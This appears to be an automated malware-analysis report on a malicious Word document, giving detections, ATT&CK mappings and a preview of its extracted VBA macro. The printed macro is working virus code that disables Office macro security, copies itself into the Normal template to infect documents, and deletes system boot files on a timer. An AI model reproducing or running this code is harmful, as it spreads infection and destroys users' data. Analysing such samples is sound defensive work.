MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains VBA macros, specifically a Document_Open macro, which is a common technique for initial execution in malicious Office documents. The macro attempts to disable security settings and export itself to 'C:\Mail.sys', suggesting it's part of a downloader or dropper mechanism. The ClamAV detections 'Win.Trojan.Psycho-3' and 'Doc.Trojan.Zmk-9' further indicate malicious intent.
Heuristics 3
-
ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Psycho-3
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17083 bytes |
SHA-256: 695f6152b6417fb7bcb6a8e1ca349cb2c0314778c9953d9fbd30fa3c99e0202f |
|||
|
Detection
ClamAV:
Doc.Trojan.Zmk-9
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ZmkMail"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error GoTo ErrorDocOpen
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
End If
Dim MyTime, COL, COLTemp, NumRnd
MyTime = Time
NumRnd = Int(Rnd * 13) + 1
THeur$ = Mid(MyTime, 1, 2)
TMin$ = Mid(MyTime, 4, 5)
TSec$ = Mid(MyTime, 7, 8)
iMacroNormalTempCount = NormalTemplate.VBProject.VBComponents.Count
For i = 1 To iMacroNormalTempCount
If NormalTemplate.VBProject.VBComponents(i).Name = "ZmkMail" Then
ZmkMailNormInstalled = -1
End If
Next i
If Not ZmkMailNormInstalled Then
ActiveDocument.VBProject.VBComponents("ZmkMail").Export "C:\Mail.sys"
NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "C:\mail.sys"
NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.DeleteLines 1, 4
COLTemp = NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.CountOfLines
NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.InsertLines COLTemp + 1, "Sub FileTemplates()"
NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.InsertLines COLTemp + 2, " Application.EnableCancelKey = wdCancelDisabled"
NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.InsertLines COLTemp + 3, "End Sub"
NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.InsertLines COLTemp + 4, "Sub ToolsMacro()"
NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.InsertLines COLTemp + 5, " Application.EnableCancelKey = wdCancelDisabled"
NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.InsertLines COLTemp + 6, "End Sub"
NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.InsertLines COLTemp + 7, "Sub ViewVBCode()"
NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.InsertLines COLTemp + 8, " Application.EnableCancelKey = wdCancelDisabled"
NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.InsertLines COLTemp + 9, "End Sub"
Else
iMacroDocuCount = ActiveDocument.VBProject.VBComponents.Count
For i = 1 To iMacroDocuCount
If ActiveDocument.VBProject.VBComponents(i).Name = "ZmkMail" Then
ZmkMailDocInstalled = -1
End If
Next i
If Not ZmkMailDocInstalled Then
NormalTemplate.VBProject.VBComponents("ZmkMail").Export "C:\Mail.sys"
ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "C:\Mail.sys"
ActiveDocument.VBProject.VBComponents("ZmkMail").CodeModule.DeleteLines 1, 4
COL = ActiveDocument.VBProject.VBComponents("ZmkMail").CodeModule.CountOfLines
ActiveDocument.VBProject.VBComponents("ZmkMail").CodeModule.DeleteLines COL - 8, 9
ActiveDocument.Save
End If
If (THeur$ = "12") Or (TMin$ = "12") Or (TSec$ = "12") Then
Call PayMail
Else
Selection.EndKey Unit:=wdStory
Selection.TypeParagraph
Selection.TypeText "1*1=1 2*2=4 3*3=9"
If (NumRnd = 13) And (TMin$ = "13") Then
MsgBox "Clear Files", , "Microsoft Word"
Kill "C:\Autoexec.bat"
Kill "C:\Config.sys"
Kill "C:\msdos.sys"
Kill "c:\io.sys"
End If
End If
End If
ErrorDocOpen:
End Sub
Private Sub PayMail()
On Error GoTo ErrorPayMail
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.